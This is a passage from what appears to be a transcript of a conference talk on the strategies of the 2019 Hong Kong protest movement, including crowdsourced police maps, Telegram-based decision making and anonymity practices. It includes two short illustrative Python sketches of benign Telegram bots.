listened. So if that doesn't work, some people thought we need to try new methods. So there was something that could be called a riot. And there were real clashes between police forces and protesters. People were tearing up the pavement, throwing bricks at the police. Police were throwing some bricks back. So that happened. And then between 2016 and 2018, another thing that was important happened, which is that after Umbrella, there were fights about what to do. And some people decided we will go and throw bricks at the police during the Fishball Revolution. Some other people decided we want to work through the institutions and we want to get elected into the Legislative Council, into the parliament, and we want to change the system from within. But what happened was that six candidates, and then later even six elected parliamentarians, were all disqualified, in some cases for not credibly promising that they essentially will uphold the Hong Kong Basic Law.
And then you also disqualify people after they've been elected. So you have democratically elected representatives of the people who essentially protested as part of an oath-taking ceremony. And those people then also got kicked out. So that looked bad. This means if you're, I'm not going to date myself, but if you're my age and you're a Hong Konger, you first lived under British colonialism where the British colonial government was in charge of your fate. And then post-97, you were just kind of handed over to the Chinese government, maybe at the age of like four, five, six, depending on how old you were. But at no point did you actually get a choice. But you also grew up with a lot more political freedom than a lot of people in mainland China. You had no internet censorship, and people in Hong Kong talk very openly about a lot of things that the Chinese government has done. And so you're very aware of things such as the Tiananmen massacre. And you're afraid that those things might maybe happen to you in 47, when you know there's an expiration date on all the freedoms that you have. In 47, you might also be part of that, and those things might also be what happens to you. But at the same time, what you'd also seen is that you'd seen freedoms eroded, and you saw all these signs that made you think that the promise of those 50 years of freedom and of a separate political system was an empty promise and that China was not intending to keep it. And this, I think, is also really important: a lot of people who I spoke to, they tell me China doesn't want one country, two systems. And if they don't want it, they will undermine it if they can. So one person who I spoke to, who is in his 20s, said China just wants one country, one system, and it's going to do whatever it wants to achieve that. And that's the mindset, I think, that we need to understand to know why people are going out on the streets right now. So people are scared of China. People don't trust the Chinese legal system. And what happens in 2019 is that the government introduces an extradition bill. Previously, one of the ways the Hong Kong legal system was kept separate from China is that it couldn't extradite people to China. So if someone commits a crime in China and flees to Hong Kong, the Hong Kong government cannot send that person to China for prosecution. But what happened is that someone committed a crime in Taiwan, which Hong Kong considers to be part of China. And that person, so this person was a Hong Kong citizen, he killed his girlfriend and fled to Hong Kong, was convicted of a couple of credit card fraud charges, but because the Hong Kong courts didn't have jurisdiction, they couldn't actually get him for the murder of his girlfriend. And so the Hong Kong government said, okay, look, we're going to get an extradition bill so we can start extraditing people to Taiwan, and then also start extraditing people to China. I mean, what do you think people thought about that? They weren't happy. So on June 9th, an estimated 1 million people went out onto the streets to protest against the extradition bill. And this is where we're starting. This is where the political movement starts. I want to give you an overview of what's happened over the past seven months, because it's easy in hindsight to forget just the scale of a lot of what happened.
So on June 9th, the official numbers are 240,000, so that's the police; the organizers say 1 million people. On June 12th, we get 40,000 people who essentially gather around the government headquarters and prevent the bill from being read a second time, from being discussed, and the police use tear gas, rubber bullets, and beanbag rounds against protesters that were largely unarmed, and in some cases held umbrellas to defend themselves. People were really mad at that, and so on June 16th, the largest protest march in Hong Kong history happened with an estimated 2 million people, which is a sizable proportion of the city's population. So, people protesting. On July 21st, I think this is one of the events that people really need to know about. While there was a protest in the center of Hong Kong, in a metro station further north in Yuen Long a group of 20 to 25 men in white t-shirts turned up and started beating people. So they just started indiscriminately beating people up who were on the metro. We all know this because there was a journalist in the same metro station, and she was live streaming the entire thing. So for 40 minutes, she was live streaming violence that people in Hong Kong had never really seen before. People are used to being relatively safe. Hong Kong has a pretty low crime rate, and there was this incredibly vicious violence that they were all seeing on their screens. So everyone knew this. At some point, there were thousands, tens of thousands of people in this live stream, and yet the police were doing nothing and didn't turn up until after these people had disappeared. And I think within that day, or within a couple of days, they didn't arrest anyone, and then later they arrested three people. But so far, nothing has come of that. That was really a turning point where people lost a lot of the trust in institutions that they used to have before, because they decided that ultimately, when in doubt, if there's some gangster beating me up, if that person is politically for the government, I cannot trust the police to come and save me. And a lot of people, especially wealthier, more well-off middle-class people, that's the point when they changed their mind. Maybe before they said, the extradition isn't that bad, I don't mind, it will be fine, but that was the moment when they saw those people getting beaten up, they looked at them and they were like, that could have been me. And that's when they said, now something needs to happen and something needs to be done about this government. So, more people go out. In the pouring rain, an estimated 1.7 million people protesting. August 31st, the estimate is tens of thousands, but this was an illegal march, so the protest wasn't allowed. So people went out to protest despite it being illegal. They knew they could be charged with illegal assembly, maybe rioting, which carries up to ten years. After that, the government essentially stopped allowing protest marches, and they were like, maybe if we don't allow you to protest, people won't come out to protest. Didn't work out. On October 1st, Chinese National Day, thousands demonstrated on the streets again, and this was the first day someone was shot with a live round, so a protestor in his 20s was shot by a policeman at close range. On October 4th, again thousands of people out on the streets, the government tries to ban masks, so they want to prevent people from hiding their faces.
You see what people do in reaction to that: they put on masks and they go out to protest, because it's Hong Kong. On November 8th, the first person died in the context of the protests. A young man who fell from a building near a police action stayed in a coma for several days and then died on November 8th. This picture is from one of the vigils for him. And several days later, the second person died in the context of the protests, an old man who was probably just a bystander at a clash between police and protesters. He was hit in the head by a brick and died several days later, also after a coma. This was what set off the most extreme and the most violent days of protest in Hong Kong that we have seen this year, and possibly ever, where people started occupying university campuses and had real battles with police to essentially defend those campuses against police. And the whole thing culminated on November 18th in police essentially laying siege to an entire university, trapping people inside, and thousands of people going out to protest and trying to essentially break through the police cordon from the outside and rescue the people who were inside, who were afraid of the police and didn't want to come out because they'd seen videos of police violence over the past few months, and they were scared because they said, I don't know what's going to happen if I go out. But they also said, we have fought for so many months at this point, so this was November, right, a month ago, they were saying we have fought for so many months, we cannot just give up, we need to at least try. One thing that happened as part of that was that people coordinated an absolutely insane exit from the besieged university, where they basically came down from a footbridge. Some of these people are climbing, but some of them are just falling down. And then you have motorcyclists waiting for them below the bridge. All of this was coordinated online. And we don't know how many people got out that way, but maybe 50 or 100, and they were able to escape arrest. The siege eventually ended. A lot of people were arrested; I think more than 1,000 people were arrested around the university that was occupied. But several days later, there were district council elections, which are basically local elections in Hong Kong. This was the electoral map before the elections. Red are pro-government parties and yellow are pro-democracy parties. There was a record turnout, the highest ever in the history of Hong Kong, and the pro-democracy camp turned the map into this. One thing that's important to bear in mind is that Hong Kong uses a first-past-the-post system. So you win in your district if you gain an absolute majority. So these seats actually don't translate into that much of an electoral difference. I think it was 60-40, so it was 60% for pro-democracy. But especially compared to what the districts had looked like before, this was an incredible achievement. And I also think this is one thing that's really important to recognize, that there's a lot of organizational work that went into this. So people put in a lot of time, a lot of work to make sure that people went out and would be able to vote, and that people knew who they were voting for. So here we are in December. By the count of the activist and writer Kong Tsung-gan, there have been 6,152 arrests at least. Possibly more. 921 people have been prosecuted, so there's an incredible backlog. And there have been 774 protests. That includes smaller ones. That was as of December 23rd.
Since then, there have been several hundred more arrests, so we're probably getting much closer to 6,500 or 6,600. And that's where we are after seven months of protests in Hong Kong. This is somewhat depressing, but it's also incredibly impressive that people have been able to keep going for such a long time. These people who are going out into the streets are not just walking for half an hour or an hour and then going home and saying, oh, now it's fine. People are entering real battles with police and in some cases running and hiding from police for hours. A lot of people have been driven to physical exhaustion. A lot of people aren't doing well mentally, because it's incredibly depressing; there's a lot of anxiety, and people are very scared of what could happen to them if they do get arrested. So one thing that I want to focus on now is how they've been able to keep this going for such a long time. Hong Kong is such a tiny place, and if you look at the resources the Chinese government and the Hong Kong government have access to — how can a protest keep going for so long? I think I have a few answers. The first answer is that the movement has very clear demands. The first is a complete withdrawal of the extradition bill, the law I was talking about earlier; that was fulfilled in September. The second is the release of arrested protesters without charges. They're saying: all of those more than 6,000 people should be released and should be able to go home without being charged, because they were trying to make their government listen to them — and there is no other way to get your government to listen to you if you cannot vote. The only thing you can do is go out on the street. The third demand is a withdrawal of the characterization of the protests as riots. This is a bit technical, but the basic gist is that there is a law, introduced by the British colonial administration, which allows police to classify a lot of protests as riots. It's a pretty broad, pretty vague definition, and a conviction for rioting carries up to 10 years in prison. Roughly a third of arrested protesters have been under 18. Imagine you're 14 years old, you're out on the streets, and you find out that you could be charged with rioting and be looking at a 10-year prison sentence. That's very scary. The fourth demand, which has some of the broadest support in the population — currently at 72% as of December 8th — is an independent investigation into police brutality, because people don't trust the government watchdog, which is essentially staffed by people the government gets to pick. There were a few international experts on that panel, and they resigned because they said this is actually a joke and we don't think we can do anything meaningful with it. So people want an independent investigation. I specifically did not include images of police brutality in my presentation, but if you think you can take the violence, I would urge you to go look them up. There's a lot of material online. Hong Kong Free Press has documented a lot of these cases and reports on the legal follow-up as well; it has not been good. And I think the violence was especially disproportionate and shocking for people because people are used to being safe.
People are not used to living in a country where the police just come and beat them up, or where the police stomp a foot on the head of an arrested protester who's already lying on the ground. They're not used to watching police kick someone who's already on the ground. They're also not used to police arresting teenagers. So that's number four. And number five is real universal suffrage. This is currently at 70% support in the broader population. The idea is essentially: people say, we want that democracy, that promise that you made us in '97 — or at least the promise we think you made us. And this is also something that has been strengthened especially over the past few months, because until a year ago maybe people thought it doesn't matter that much whether I get to elect the government, because things will be fine and most of the people in government are competent. But over the past seven months they've been watching a government that essentially refused to listen to any of the protesters and pretended that none of their demands were in any way politically legitimate. So now a lot of people who were fine with things a year ago are saying: well, now we need democracy, because we've seen what happens when you have a government that doesn't represent the people it's supposed to represent. I think this is an important strategy because it means that everyone who goes out knows what they're protesting for. Since July people have been going out on the streets and saying: these are the five things we want, this is what we want, nothing else. Notably, independence is not part of this list, although the Chinese government likes to say that the protesters are separatists. Independence is not a demand of the movement, and it also has pretty low support in Hong Kong. Instead, because you have these five demands, it's very catchy, and people have even come up with a protest hand sign. Whenever you see pictures of the protests, you will see people holding up their hand like this — five fingers for the five demands, and then one more, saying: not one less. So that's one guiding slogan they've been using. And it's been memed; everything gets memed in the Hong Kong protests. For example, if you're disappointed with the new Star Wars movie, go to Hong Kong, because there's a lot of very entertaining Star Wars content that includes protesters. On the left you can see, at the bottom, it again says "five demands, not one less", and the image on the right also has that in Chinese.

Strategy number two: be water. This is an image by an artist — you've seen some of the images where people cover their faces to protect themselves against tear gas and to avoid being identified, and there was a week when people started drawing the Pokémon of the Hong Kong protests. This was the image for "be water". Be water has been a guiding principle of the movement since the very beginning, and it's based on a Bruce Lee quote — he's a martial artist, he was in a bunch of kung fu films from Hong Kong. He said: empty your mind, be formless, shapeless, like water. Now you put water in a cup, it becomes the cup. You put water in a bottle, it becomes the bottle. You put it in a teapot, it becomes the teapot. Now water can flow, or it can crash. So the idea of being water is that you accumulate and gather people in places unexpectedly and very quickly, and you disappear as quickly as possible.
There were scenes where protests of thousands in the center of Hong Kong just dissipated and disappeared into nothingness. This is how you can avoid police capture in many cases: you don't sit and stay in one place like people did with Occupy Central in 2014; you leave once the police turn up. But you don't even have to wait for the police to show up to know that they're coming, because what people have started doing is building maps. First there are scouting channels: when people see police, they submit a report — there are bots where you can submit reports. You say: I've seen a police unit going from here to there, in this direction, this many policemen. And that gets posted to a Telegram channel with a hashtag for the location it was seen in (a minimal sketch of what such a relay can look like follows below). One person I interviewed, who is middle-class and doing really well — I asked him what the protests changed about him, and he said: it really changed my frame of mind, because now I'm used to observing the deployment of police whenever I see it. I get alerted by a siren, and once I see something, I will immediately send the info to a Telegram channel. These reports then get turned into maps. This was Christmas Eve in Hong Kong — people got a white Christmas not because there was snow but because there was a lot of tear gas. The reports that people send in are turned into a map that you can use to strategically avoid being captured by police. Some relatives of mine, for example, wanted to go to Hong Kong and said, well, we're worried about going into areas of protest, and I said: you can use this map and see really easily which areas you shouldn't go into. Basically, if there are a lot of icons in a place, that means a lot of stuff is happening there. The puppy logo means police units or police cars; the water drops towards the middle left mean there's a water cannon right there that you probably want to avoid. There are also different signs for the different police units — the Raptors, for example, are portrayed with dinosaur icons. In addition to that, you can see at what time a report was submitted, and you can verify a report. Further down, towards the lower part of the map, there's a camera sign, which means there are live feeds from that place. So if you want to know what's going on somewhere, a lot of Hong Kong journalists are live-streaming the protests, and you can just go and watch a live stream to see what's really happening on the ground right there. There's even a website that compiles up to nine live streams at the same time, so you can watch all of them at once on your screen to make sure you know what's happening. These maps are extremely useful, and there's no way of saying how many people they've helped to avoid arrest.
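As an aside for the technically curious: the report relay described above doesn't need to be anything sophisticated. Here is a minimal, purely hypothetical sketch in Python of what such a bot could look like, using only the public Telegram Bot API (getUpdates and sendMessage). The token, channel name and message format are made-up placeholders — this is not the actual tooling used in Hong Kong.

```python
# Hypothetical sketch of a police-sighting relay bot (Telegram Bot API).
# Token, channel and report format are placeholders, not the real setup.
import requests

BOT_TOKEN = "123456:ABC-placeholder-token"
API = f"https://api.telegram.org/bot{BOT_TOKEN}"
CHANNEL = "@scout_reports_example"  # public channel; the bot must be an admin there


def relay_reports() -> None:
    offset = None
    while True:
        # Long-poll for new messages sent to the bot.
        resp = requests.get(f"{API}/getUpdates",
                            params={"offset": offset, "timeout": 30}).json()
        for update in resp.get("result", []):
            offset = update["update_id"] + 1
            msg = update.get("message") or {}
            text = (msg.get("text") or "").strip()
            # Expect reports like: "Mong Kok | 3 vans + 1 water cannon, heading north"
            if "|" not in text:
                continue
            district, _, detail = text.partition("|")
            report = f"#{district.strip().replace(' ', '')} {detail.strip()}"
            # Repost to the public channel so scouts and map makers can pick it up.
            requests.get(f"{API}/sendMessage",
                         params={"chat_id": CHANNEL, "text": report})


if __name__ == "__main__":
    relay_reports()
```

The interesting part is not the code but the workflow it enables: hundreds of strangers feeding one shared, hashtag-searchable stream that map makers can consume.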
One friend of mine, who went out to protest in July, told me he was going home from a protest wearing the distinctive black shirt that protesters usually wear. He didn't have a change of clothes, he wanted to avoid arrest, and he told his friends. Within a few minutes, they sent him a screenshot of Google Maps showing him his escape route — going around all the police units they could see on the map, using only open, crowdsourced information that was made freely available online and that people put on maps like this. I think that's worth clapping for, because these are people's lives, right? Even if only 10 people escaped arrest because of these things — we don't know for how many years those people could have been sent to prison. Maybe they'd only have been fined, maybe they'd have been sent to prison for three years. But all of that is time in people's lives, the lives of people who have been going out to protest, and all of it was saved thanks to people crowdsourcing and open-sourcing this information. That's an incredible effort that people have been making for months now, and an incredibly important institution that has really helped people.

The next part of be water is decentralized decision making. One of the reasons I talked about the history of Hong Kong protests before, and all of that political context, is that I think it's very important to understand where people are coming from. People of all ages are protesting, but it's really young people who are disproportionately against the government and against the bill. Earlier, in June or July, the numbers were that well over 90% of people under 16 opposed the extradition bill — almost 100% among people who are not even close to being eligible to vote. But these people have also been protesting for a very long time, and they've learned from the past. One thing they learned from 2014 is that if you're a leader, you get arrested and you get put in prison. Joshua Wong, who you may have heard of, is one of the people that happened to. Another is Edward Leung, who was a leading figure of the fishball riots in 2016; he's currently still serving time in prison. But how do you organize a movement without political leaders? Well, you do the whole crowd intelligence thing: you have grassroots decision making, you have a leaderless movement. Hong Kong is not the first place this has happened — the Gezi protests in Istanbul in 2013 did something similar — and now it's happening in Hong Kong. If you have no leaders, you have nobody the government can arrest to cripple the movement. They can arrest one person, they can arrest 100 people, they can arrest 6,000 people, but all of those people are only drops in the bigger movement and in that wave we were talking about earlier. So how does political decision making work when you have thousands of people? There are Telegram groups, primarily, and there's also a forum called LIHKG that's a bit like Reddit, and people have political discussions on those. In addition to that, people often have groups on WhatsApp and on Facebook — my parents are probably not on Telegram, but the equivalent of their generation has groups on Facebook. That's where people talk about what they think should happen, about strategic questions, about what their aims should be. It's happening on all these platforms. And if you have an idea or an argument you think is important, you share it, and if people agree with you, they start sharing it further.
So decision making has a kind of snowball effect: once you're in different groups, you see arguments that people agree with reappearing in 10, 15, 20 groups, or people start rephrasing them, and that's how consensus is often built. At the same time, if you have an idea for a really cool protest action — say you want people to form a human chain across part of Hong Kong, which is something they actually did — someone just comes up with it and posts about it online. Then someone made a poster for it, more people made posters, lots of people said this is a great idea, and so they just did it. I hope that especially hackers can empathize with this idea: someone has a cool idea, does it, people recognize that it is cool and go along with it. That's how a lot of the movement has been working for the past few months. Another example is the December 1 protest, where thousands of people came out because someone — basically the equivalent of a Reddit user in his 20s — had just said: well, I thought we should try to have a protest again. The government actually gave him permission, and all of a sudden there were thousands of people out on the streets again, because anyone can register a protest. One thing that's hard is decision making. Some of these groups have thousands of people; I think I'm in several Telegram groups that have maybe 60,000 or 70,000 members. So often people use polling to make decisions. I don't know whether you know the poll function in Telegram: the admins can send out a poll and say, these are your four options, do you think we should do A, B, C or D — and then people just vote. That's how a lot of the decision making and discussion on demands, or on deadlines people were trying to set, happened earlier in the movement. But it's also something people can use when they need to make strategic decisions quickly, on the spot.
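For the technically inclined: pushing out such a poll is essentially one call against the public Telegram Bot API (sendPoll). A minimal, hypothetical sketch — the token, channel and question are placeholders, and this is not the movement's actual tooling:

```python
# Hypothetical sketch: an admin bot posting a quick strategy poll to a channel.
# Channel polls are anonymous by default, which fits the use case described above.
import json
import requests

BOT_TOKEN = "123456:ABC-placeholder-token"
API = f"https://api.telegram.org/bot{BOT_TOKEN}"
CHANNEL = "@big_strategy_channel_example"  # placeholder channel with many followers


def ask(question: str, options: list[str]) -> None:
    requests.get(f"{API}/sendPoll", params={
        "chat_id": CHANNEL,
        "question": question,
        "options": json.dumps(options),  # the Bot API expects a JSON-encoded array
    })


# Example: the kind of on-the-spot question described in the text.
ask("Police are massing nearby. Should we stay or leave?", ["Stay", "Leave now"])
```

Tens of thousands of subscribers then see the running totals update live, which is exactly what turns a channel into a crude but fast voting mechanism.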
On August 12, people occupied the Hong Kong airport, which is an incredibly important international hub, and they managed to basically paralyze the entire airport. The Hong Kong government announced that day that flights would stop taking off at 4 p.m. Rumors started that the police would come in and clear out the airport violently with tear gas, and the police were deploying more and more people towards the airport. Because you have all these Telegram channels, you see people taking pictures of police and posting them, and you think: oh my God, there's all this police coming towards the airport, and I am here. They cut off the metro, so you cannot take the train back into the city, and the Hong Kong airport is on an island — you cannot get away from there. So there was a lot of heated discussion back and forth that day, people asking: is it safe, is it not safe? Ultimately there was one channel with, I think, 60,000 followers, and the admins kept asking: should we stay or should we go? The ratios kept shifting towards leaving, and suddenly it was 70 to 30%, and people said: okay, this is it, we're leaving. That was the moment when you could see people changing their minds right on the spot. There was nobody who said "we're now leaving", not a single person who said "we're going back" — just thousands of people who were watching and who said: this looks too dangerous, we need to stay safe, we need to go home. The result was a mass exodus where people literally walked for hours, as you can see in this picture, because the buses were full and stopped running and the metro had stopped running, but they needed to get back home. One of the funniest things I have heard of as part of the be-water and grassroots decision-making strategy: I was talking to Xifan Yang, who is the China correspondent for a German newspaper, and she was reporting from a small group building street blockades in Hong Kong. They were practicing grassroots decision making in person. They build a blockade, they hear the police are coming — scouts are telling them — so they leave, or they run into the metro, but they need to know where they're going next, because there is no plan. If you have no plan, the police can't know your plan and can't wait for you there; but also, you have no plan. So you have five or ten people just shouting at each other on the metro platform. Someone says we should go here, another person says we're going there, and maybe after five minutes of shouting they decide: okay, we have reached consensus — swarm intelligence. But it works. It's chaotic, but it works, because it really makes it hard to figure out where people are going next. Another really hard thing about this whole grassroots, bottom-up decision making has been: how do you correct course? If you make mistakes, how do you correct them when there's nobody who can tell someone they need to stop? Again, this was something you could observe during the airport protests, where people occupied the entire departure hall and at some point — I think they called it a citizen's arrest — tied a person they thought was an undercover policeman from China to one of those luggage carts and beat him up. I think he got out of it in the end, but it was an incredibly ugly scene, and when you were watching it, it felt a lot like mob violence. Afterwards a lot of people were saying: this is a sign that this whole leaderless-movement thing is not working, that you cannot actually change anything about your behavior, that nobody can tell these people they need to change their minds. But what happened afterwards is you saw the same thing I was describing earlier. People saw this was bad, and people agreed that it was bad. People went around and kept encouraging everyone else: you need to be careful, don't use violence; if you think someone is an undercover cop who is spying on you, you can't just beat the person up. Later there was one scene where people ran into someone they thought was maybe a cop from mainland China, and instead of beating him up, they all stood around him and started taking selfies with him. In addition to that, you increasingly see people pulling others back. If there's a person whose temper is running really high, often there will be people around them who say: no, we're going to pull you back, you can't attack this person. People try to write guidelines: you need to be careful about journalists, don't accuse people of being fake journalists.
So, all these things — there was a lot of self-correction and self-control coming out of that moment. I thought that was really interesting and really important, because it was one sign that course correction can happen even when you have thousands of people. But it requires everyone to participate, and it requires people to be willing to interrogate the things they have done and possibly admit mistakes.

Strategy four: anonymity. Again, maybe something hackers can empathize with — I know there are, as usual, a lot of talks here about how to maintain your security and anonymity online. For people in Hong Kong, this has become incredibly important. The thing about feeling that your political system is being eroded, and that all the security, certainties and rights you had are slowly disappearing, is that you don't know where the line has moved to. A lot of people I've spoken to don't feel they can speak politically online anymore, because they don't know what the consequences will be. Instead, people start changing the names on their Facebook accounts, for example, because something they would have said openly a year ago they no longer dare to say under their own name. There are people who have probably been fired for things they said on Facebook, such as the person who was a union leader with a Hong Kong airline. Anonymity is enforced both in person and online, again through a lot of community control — people supporting each other and enforcing these rules among themselves. Online it's very much a social rule: if you're in a working group on Telegram and people start chatting about personal stuff, there will usually be someone who tells everyone else: get back to work, stop talking about that, you're disclosing too much about yourself. One phrase people keep using is: there are ghosts. The operational assumption is that in any group there will be someone listening. Especially in the bigger groups, you can never assume that there is no police in there. So you can do your work, but assume that you're being watched while you're doing it. Another thing is that there are several channels dedicated to cybersecurity. One channel, for example, started passing around JPEGs with instructions for how to set your Telegram settings. You have to assume that a lot of the people you're working with don't necessarily have much interest in technology, and maybe have going out to protest as their highest priority, so it helps to have easy rules. People send around these instructions that say: toggle these things in your Telegram settings — that ensures nobody who isn't already a contact of yours can see your phone number; or change this other thing, and your account essentially self-destructs if you're inactive for seven days. So in many ways a lot of this is about social enforcement, and about breaking things down and making them as accessible as possible. Another thing is that there's a Telegram account that alerts people when someone has been arrested. The operational assumption is that if you've been arrested, you're compromised.
And so it posts the names and Telegram handles of people who have been captured by police and tells people: delete this person's contact, delete this person from all of your chats, so that you don't get compromised as well. That's another way they're trying to maintain that very basic security. I don't know how well this is working, to be very honest. I haven't really heard any reports of people being arrested for things they've done on Telegram. But that might also just mean it hasn't been reported, or we don't know about it. It's also possible that the police have simply been very busy mass-arresting people at protests, that they have all this data, and that they might be watching people and come back around to it later. Sometimes people have actually been able to identify — or think they've been able to identify — the Telegram handles of policemen, which led to several people being kicked out of groups. So the assumption is that the police are probably watching, but we don't know how much information they have access to. In real life, you can see in the lower right corner the usual outfit people are wearing. These are frontliners, who tend to be more directly involved in clashes with the police. People cover their faces, usually with gas masks, sometimes just simple surgical masks. They wear goggles and hard hats to protect against projectiles, pepper spray, water cannons, tear gas — the things you encounter in the streets of Hong Kong these days. In addition to that, people have all of these umbrellas, which they use to hide each other's identities. For example, if people are building a street blockade, there are always some people building the blockade and others holding up umbrellas to prevent them from being photographed. Given how heavily covered the protests are, this is especially important, because there are reporters and media around all the time, and people want to make sure they don't accidentally end up on camera while committing what is probably a crime. There are other ways this is used as well. For example, people in some cases destroyed cameras in the metro stations, because they were very aware that they were being filmed by someone they couldn't talk to — people have asked individuals to delete pictures and videos when they've seen them filming, but they've also destroyed these cameras on the metro. And again, someone will cover you with an umbrella to avoid you being filmed in the middle of essentially committing vandalism. The other thing is that people have this kind of uniform, which you can also see here: people essentially wear black for the protests, which also means you have no recognizable marks on you in the moment. And then, when you practice be water and you hear the police are coming, you go into a side street. Often there are people who are not personally participating in the protests directly, but who, for example, donate regular clothing — basically any clothes that aren't black. This was particularly the case in the summer, during the mass protests, when people would just bring t-shirts into metro stations as people were often leaving with the last train.
And so people would rush into metro stations, and you'd see people changing in side streets, to get out of that very recognizable black gear and into these other clothes. So Hong Kongers have basically managed to build the world's largest black bloc, which is another way of maintaining anonymity. The government recognizes that this is a problem for them, and in October they tried to address it by implementing a mask ban. The mask ban covers anyone who wears a mask at a lawful rally or march, at an unlawful or unauthorized assembly, or during a riot. So even if you go to a peaceful protest but cover your face, you can be sentenced to up to one year in prison simply for trying to hide your face. This law was implemented under the emergency ordinance, which is essentially a kind of national security law that gives the government sweeping powers in particular emergency situations. It is currently unclear to what extent this is constitutional; the mask ban has been challenged in court multiple times and is still making its way through the courts. But it's also possible that Beijing might come in and say: we have the ultimate right to interpret the Hong Kong Basic Law, so we will say that this law has to be constitutional. So this is something we just need to wait out, but I think it's a sign that the government wants to limit people's ability to maintain their anonymity. And people were really pissed off at this. It was announced on a Friday, during the work day, and in the afternoon, once people got off work, they went out on the streets — school children in their school uniforms, people in their office clothing — everyone put on a mask and said: we want to keep this right. Because at midnight that day the mask ban was supposed to come into force; you had less than 24 hours' notice, and it went into force the next day.

Strategy five: division of labour. This again is something I think is very interesting and very uniquely Hong Kong, like the be-water strategy. There's this idea of climbing the mountain in different ways. It's again a lesson people learned from 2014, because going into 2014 and afterwards, one of the biggest weaknesses of the pro-democracy movement was a lot of internal division. People really disagreed over tactics, and there were fights over who was leading the movement, who should be listened to, and what the right strategy was. People have now gone to the opposite extreme: whatever you do, everyone is climbing the mountain, everyone is trying to get to the top, and everyone is using their own path to get there — hence the mountain imagery. One example that illustrates this very clearly is a person who is middle-aged and works in the finance industry in Hong Kong, so they're very well off and have profited from the system as it exists, but they also support the protests. They said: I did not get involved in the protesters' destructive actions, and I never would, but I will try my best to give them more support by delivering materials, donations, and my presence. So you can see there's a very clear differentiation between the goal people share and the methods they choose.
There are a lot of people who say: I disagree with those methods, but I will not undermine people who are working towards our shared goal, the five demands, in different ways. This is also notable because in 2016, violence was something that was condemned. I can't speak to that many other contexts, but for example in the US, where I study, and similarly in Germany, once protesters use violence — even if it is just destruction of property — there is often a lot of pushback, and people say that has delegitimized you. That is not really working that way in Hong Kong anymore. There are clearly people who disagree with vandalism, and there are also people who are against the protesters because of the vandalism — based on the polls I would say maybe 30 or 40%, I'd have to check the exact numbers. But there are a lot of people who say: even if I disagree with you, I will still support you, because our overall goal is what matters most. I want to quickly give two examples of how this can work. One example is that people have developed an increasingly economic understanding of how politics works. Rather than saying we just want to change laws, they also say: we need to hold accountable the companies that support the government, and we need to make government-supporting companies feel the pain for their political support. So people have started boycotting stores that don't support the protests, and again this is all collected online, where you have these incredible resources: entire custom Google Maps that tell you which stores in Hong Kong support the protests, and entire lists for different sectors. For food, for example, the lists say these stores are for us and these stores are against us. One of the people I spoke to was amazed at this. They are almost 40 years old, they have lived in Hong Kong for a long time and were often frustrated with how unpolitical the city was, but they said now it's the exact opposite and everything has become political: where you get your lunch, where you get your coffee, even what kind of public transport you take — everything is now political, and everything you use shows which political side you are on. The idea is really to hurt stores so much that it becomes economically unviable to be against the protest movement. Some people also use the lists for vandalism against stores. This has been seen with, for example, Starbucks, because the people who own the Starbucks franchise in Hong Kong have very vocally opposed the protests, so in some cases hurting them financially also means smashing windows. Another example is the same person I spoke to, who by the time I talked to them a couple of weeks ago had stopped going out to protests. This really surprised me, because I met them during the protests in 2014, and I thought: if there is one middle-aged person who would still go out, then, of the people I know, it's you. But they said: well, I decided that I have different skills, and that my design skills are something I can use better in a different place.
And so, because at the time people were already working towards the district council elections — and they were still working, I don't know, 60-hour weeks or something crazy — they decided to start working on the campaign of one of the district council candidates, a person who had never been in politics before. In the interview they said: I can help this person, I'm going to be able to help them get elected. So they essentially did social media work and a lot of campaigning and design for them. I think that's a good example of the different kinds of effort that went into that district council election victory as well: all these people made a choice that this is something they care about and, again, they're all climbing the mountain in different ways — these people decided that their way is supporting local politicians in getting elected to the district councils.

The other thing is that this division of labour doesn't only happen in terms of what you choose to do; there is also an incredibly sophisticated and well-defined division of labour on the ground. This is a representation of what the movement is supposed to be like: the idea that we're all Hong Kongers, we're all part of this movement, and it doesn't matter what we're doing, we're all part of the same thing. That diversity gets represented a lot, and it appears in a lot of protest art as well. The most distinctive group, which you've definitely seen, are the frontliners. These are the people who wear the most recognizable uniform: all in black so they cannot be identified, a gas mask to protect against pepper spray and tear gas, goggles for the same reason, hard hats, and often gloves so they can grab the tear gas canisters being thrown at them. In some cases they carry water bottles to extinguish the tear gas canisters, to avoid being affected by the gas itself. This is how you signal that you're one of what are sometimes called the braves — essentially, this is about as radical as you can look as part of the Hong Kong protest movement. These are the people who will be in clashes with police; you can see that one of them is probably about to grab a brick. Those are frontliners. One particular type of frontliner are the — I was missing the English word — firefighters, except instead of fighting fire they're fighting tear gas. On the right you can see someone from an incredibly iconic scene where a protester used a metal tin of the kind you usually use to steam fish: he extinguished the tear gas with water and put the metal tin over the canister, and people were making fun of how protest-ready you are with a regular Chinese kitchen.
On the left, this is a reference to a strategy people have been using where they put a traffic cone over the tear gas canister the moment they find it: one person holds the traffic cone, one person pours water in at the top to extinguish the tear gas, and in some cases people put the canister into plastic bags filled with water to extinguish it — and sometimes throw it back at the police. I think I actually have a video of this happening. You can also see that they weren't doing this for the first time; they'd clearly been doing it for a while. It's sad in many ways that these are young people who have to do this and feel that it's something they need to do to be heard. But there was also a video out of Chile a couple of weeks ago where Chilean protesters were using a similar strategy to extinguish tear gas, and someone who was apparently from Chile posted it somewhere saying: thank you, Hong Kong. So clearly there has been some "let's see how we can adapt these strategies" for what's happening in Chile itself, which I think is important to look at as well: in some ways Hong Kongers have learned from other places, but now people are also looking at Hong Kong, looking at these strategies, and adapting them elsewhere. Another important group are the peaceful protesters. I'm very thankful that someone memed all of the important groups, so I have these standard images I can use. And this is really all you need as a peaceful protester: a surgical mask, maybe a hat to protect your identity a bit more, and that's it — you just need to go out on the street. These are the people the frontliners in many ways feel they are defending. When I was talking to a few people who are still in high school, who are frontliners and have been in clashes with the police directly, I asked them why they're doing it, and they said: I don't even know whether we can achieve our political aims, but the very least I can do is be one more person who is there, and when the police advance, I'm going to be one more person who can make sure the police don't get to the peaceful protesters behind me, because they're not equipped to deal with tear gas and pepper spray — so I will be here and give them enough time to retreat and go home. There's a lot of lionization of frontliners, because they're the flashy heroes of the movement in a way, but everyone also knows that the movement was never going to succeed, and wouldn't have been able to keep going, on frontliners alone. The peaceful protesters are the heart of the movement as well, the people who keep coming out in numbers. So there are a lot of reminders that we all need to work together — this idea that we cannot be divided, which goes back to the idea that we all climb the mountain in different ways, so we're all important.
